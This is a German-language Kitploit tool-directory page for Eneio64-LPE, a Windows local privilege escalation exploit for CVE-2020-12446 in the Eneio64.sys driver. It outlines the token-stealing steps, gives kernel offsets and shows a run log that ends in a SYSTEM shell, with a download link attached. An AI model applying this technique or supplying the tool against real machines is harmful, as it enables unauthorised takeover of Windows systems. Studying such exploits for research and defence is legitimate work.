Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Eneio64-LPE — Ein Exploit für CVE-2020-12446 Eneio64.sys. Verwendet Superfetch für die Adressübersetzung. | Kitploit
Tools/GitHubGitHub/s1lkys/eneio64-lpe
Privilege EscalationExploitationLernen & BildungBinary-Exploitation
GitHubs1lkys/eneio64-lpe

Eneio64-LPE

Ein Exploit für CVE-2020-12446 Eneio64.sys. Verwendet Superfetch für die Adressübersetzung.

Repository anzeigen
3vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
  1. Öffnet ein Handle auf den verwundbaren Treiber
  2. Mappt physischen Speicher in den Userspace
  3. Öffnet ein Handle auf den Systemprozess
  4. Fragt die SystemHandleInformation-Tabelle des aktuellen Prozesses ab, um das erhaltene System-Handle zu finden und die EPROCESS-Adresse preiszugeben.
  5. Durchläuft die System-EPROCESS-ActiveProcessLinks-flink, bis die PID des aktuellen Prozesses gefunden wird.
  6. Patched das Token des aktuellen Prozesses mit dem Token des Systemprozesses
  7. Startet einen neuen PowerShell-Prozess.

Verwendet die Superfetch-Methode zur virtuell-zu-physikalischen Adressübersetzung anstatt CR3 zu leaken und Seitentabellen zu durchlaufen.

Getestet auf Win11 21H2

root@kitploit:~
C:\Users\Public>.\Eneio64-LPE.exe
[+] Total physical memory: ~0x7fef2000 bytes
[+] Mapped physical memory at 000002A3A4FC0000
[+] Leaking System EPROCESS
[+] Opened handle to SYSTEM process (PID 4)
>    Current PID:  3932
>    Handle value: 0x5c
[+] Querying SystemHandleInformation table of current process
[+] Handle table queried successfully
>    Buffer size:    1048576 bytes
>    Resize rounds:  15
>    Total handles:  29211
[+] Searching for handle 0x5c in handle table
[+] Match found at index 29183 / 29211
>    PID:                      3932
>    Handle:                   0x5c
>    Object (System EPROCESS): 0xffff858ca1885040
[+] Searching for current process token. Walking ActiveProcessLinks from System Flink (System EPROCESS + 0x448) to current PID
[+] Next Flink addr - 0x448 = Next EPROCESS
[+] Found current process (PID 3932) token at [0x72cd25f8]
[+] Patching current token with SYSTEM token
[!] ==== Flink addr of current PID - EPROCESS ActiveProcessLinks Offset (0x448) + EPROCESS Token Offset (0x4B8) = Current Token ====
[+] Token replaced.
Microsoft Windows [Version 10.0.20348.2849]
(c) Microsoft Corporation. All rights reserved.

C:\Users\Public>whoami
nt authority\system

Nur für Bildungszwecke!

Tool herunterladen